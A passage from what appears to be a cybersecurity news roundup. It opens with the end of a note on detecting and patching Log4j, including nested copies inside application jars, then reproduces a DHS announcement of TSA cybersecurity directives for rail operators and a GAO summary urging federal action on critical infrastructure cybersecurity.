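Two points the script makes that the list alone does not: the presence of JndiLookup.class is not by itself a verdict, since a patched release still ships the class, so version decides exposure and the class check only tells you whether the removal workaround has already been applied; and the copy of Log4j that matters is often the one buried inside an application's own jar, which a file-name search for log4j-core would not find. For a nested copy the rewrite has to be applied to the inner jar and the outer jar repacked, which the removal helper above deliberately does not do.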

DHS Announces New Cybersecurity Requirements for Surface Transportation Owners and Operators

DHS’s Transportation Security Administration (TSA) has announced two new Security Directives and additional guidance for voluntary measures to strengthen cybersecurity across the transportation sector in response to the ongoing cybersecurity threat to surface transportation systems and associated infrastructure. These actions are among several steps DHS is taking to increase the cybersecurity of U.S. critical infrastructure.

“These new cybersecurity requirements and recommendations will help keep the traveling public safe and protect our critical infrastructure from evolving threats,” said Secretary of Homeland Security Alejandro N. Mayorkas. “DHS will continue working with our partners across every level of government and in the private sector to increase the resilience of our critical infrastructure nationwide.”

TSA is increasing the cybersecurity of the transportation sector through Security Directives, appropriately tailored regulations, and voluntary engagement with key stakeholders. In developing its approach, including these new Security Directives, TSA sought input from industry stakeholders and federal partners, including the Department’s Cybersecurity and Infrastructure Security Agency (CISA), which provided expert guidance on cybersecurity threats to the transportation network and countermeasures to defend against them.

The TSA Security Directives announced today target higher-risk freight railroads, passenger rail, and rail transit, based on a determination that these requirements need to be issued immediately to protect transportation security. These Directives require owners and operators to:

- designate a cybersecurity coordinator;
- report cybersecurity incidents to CISA within 24 hours;
- develop and implement a cybersecurity incident response plan to reduce the risk of an operational disruption; and,
- complete a cybersecurity vulnerability assessment to identify potential gaps or vulnerabilities in their systems.

TSA is also releasing guidance recommending that all other lower-risk surface transportation owners and operators voluntarily implement the same measures. Further, TSA recently updated its aviation security programs to require that airport and airline operators implement the first two provisions above. TSA intends to expand the requirements for the aviation sector and issue guidance to smaller operators. TSA also expects to initiate a rule-making process for certain surface transportation entities to increase their cybersecurity resiliency.

These efforts are part of a series of new steps to prioritize cybersecurity across DHS. Secretary Mayorkas first outlined his vision for the Department’s cybersecurity priorities in March, which included a series of focused 60-day sprints designed to elevate existing work, remove roadblocks to progress, and launch new initiatives and partnerships to achieve DHS’s cybersecurity mission and implement Biden-Harris Administration priorities. To learn more about the sprints, please visit www.dhs.gov/cybersecurity.

GAO Report: Cybersecurity - Federal Actions Urgently Needed to Better Protect the Nation's Critical Infrastructure

Recent events—including the ransomware attack on a major U.S. fuel pipeline—illustrate the need to strengthen the cybersecurity of the nation's critical infrastructure.

We testified on the need for the federal government to develop and execute a comprehensive national cyber strategy, and to strengthen the role that it plays in protecting the cybersecurity of critical infrastructure. Ensuring the cybersecurity of the nation is on our High Risk List, and we have urged federal agencies to act on it.

If the federal government doesn't act with greater urgency, the security of our nation's critical infrastructure will be in jeopardy.

GAO has previously reported on major cybersecurity challenges facing the nation and the critical federal actions needed to address them (see figure).

Four Major Cybersecurity Challenges and 10 Associated Critical Actions

To address critical infrastructure cybersecurity, key actions the federal government needs to take include (1) developing and executing a comprehensive national cyber strategy and (2) strengthening the federal role in protecting the cybersecurity of critical infrastructure.

Develop and execute a comprehensive national cyber strategy. In September 2020, GAO reported that the White House's 2018 National Cyber Strategy and related implementation plan addressed some, but not all, of the desirable characteristics of national strategies, such as goals and resources. GAO also reported that it was unclear which official within the executive branch ultimately maintained responsibility for coordinating the execution of the National Cyber Strategy. Accordingly, GAO recommended that the National Security Council update the cybersecurity strategy and for Congress to consider legislation to designate a position in the White House to lead such an effort.

In January 2021, a federal statute established the Office of the National Cyber Director within the Executive Office of the President. In June 2021, the Senate confirmed a Director to lead this new office. In October 2021, the National Cyber Director issued a strategic intent statement, outlining a vision for the Director's planned high-level lines of efforts. The establishment of a National Cyber Director is an important step toward positioning the federal government to better direct activities to address the nation's cyber threats. Nevertheless, GAO's recommendation to develop and execute a comprehensive national cyber strategy is not yet fully implemented. As a result, a pressing need remains to provide a clear roadmap for addressing the cyber challenges facing the nation, including its critical infrastructure.

Strengthen the federal role in protecting the cybersecurity of critical infrastructure. Pursuant to legislation enacted in 2018, the Cybersecurity and Infrastructure Security Agency (CISA) within the Department of Homeland Security (DHS) was charged with responsibility for, among other things, enhancing the security of the nation's critical infrastructure in the face of both physical and cyber threats. In March 2021, GAO reported that DHS needed to complete key activities related to the transformation of CISA, including finalizing the agency's mission-essential functions and completing workforce planning activities. GAO also reported that DHS needed to address challenges identified by selected critical infrastructure stakeholders, including having consistent stakeholder involvement in the development of related guidance (see figure). Accordingly, GAO made 11 recommendations to DHS. As of November 2021, DHS had not yet implemented them, though it stated its intent to do so.

Cybersecurity and Infrastructure Security Agency (CISA) Coordination Challenges Reported by Stakeholders Representing the 16 Critical Infrastructure Sectors

Regarding specific critical infrastructure sectors, since 2010 GAO has made about 80 recommendations to enhance the cybersecurity of these sectors and subsectors, including within the aviation and pipeline industries. In October 2020, GAO reported that, although the Federal Aviation Administration had established a process for certification and oversight of U.S. commercial airplanes, it had not prioritized risk-based cybersecurity oversight or included periodic testing as part of its monitoring process, among other things. In July 2021, GAO testified that the Transportation Security Administration had not fully addressed pipeline cybersecurity-related weaknesses that GAO had previously identified, such as aged protocols for responding to pipeline security incidents. Until GAO's recommendations to address issues such as these are fully implemented, federal agencies will not be effectively positioned to ensure critical infrastructure sectors are adequately protected from potentially harmful cybersecurity threats.
